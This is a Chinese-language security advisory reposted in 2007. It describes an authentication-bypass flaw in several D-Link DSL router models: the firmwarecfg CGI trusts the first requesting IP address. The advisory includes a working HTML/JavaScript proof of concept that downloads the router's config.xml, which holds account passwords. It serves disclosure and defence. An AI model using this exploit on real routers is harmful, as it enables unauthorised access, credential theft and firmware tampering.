D-Link DSL路由器可绕过访问认证漏洞

来源:岁月联盟 编辑:zhuzhu 时间:2007-09-17
D-Link DSL路由器可绕过访问认证漏洞 受影响系统:
D-Link DSL -G604T
D-Link DSL -562T
D-Link DSL -504T
D-Link DSL -502T
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 13679

D-Link DSL路由器是家庭和小型办公室常用的路由器。

D-Link DSL路由器对用户访问的认证存在问题,远程安全者可能利用此漏洞非授权访问设备。

在执行CGI /cgi-bin/firmwarecfg时,脚本会检查在/var/tmp/中是否存在fw_ip文件。如果存在这个文件的话,就会允许其中列出的所有IP地址无需认证直接访问设备。如果不存在这个文件的话,CGI就会创建一个新文件,在其中写入请求地址。

如果可以从Internet访问Web配置控制台且之前没人调用过CGI的话,则任何用户都可以访问路由器,下载包含有用户帐号和口令的config.xml文件,导致访问专用网络,修改或更改路由器的固件等。

<*来源:Francesco Orro (francesco.orro@akhela.com)

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111652806030943&w=2
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有安全性,仅供安全研究与教学之用。使用者风险自负!
<html><head>Download config.xml:<title>GetConfig - Config file
download</title></head><body>

<script lang="javascript">
function invia_richiesta()
{
document.DownloadConfig.action='http://'+document.InputBox.Host.value+'/cgi-
bin/firmwarecfg';
document.DownloadConfig.submit();
}
</script>

<form name="InputBox">
<br>http://<input Name="Host" type="text" value="">/cgi-bin/firmwarecfg<br>
</form>
<form name="DownloadConfig" method="POST" action=""
enctype="multipart/form-data">
<input type="Submit" name="config" value="Download"
onClick="javascript:invia_richiesta();"><br>
</form></body></html>建议:
--------------------------------------------------------------------------------
厂商补丁:

D-Link
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.dlink.com/

图片内容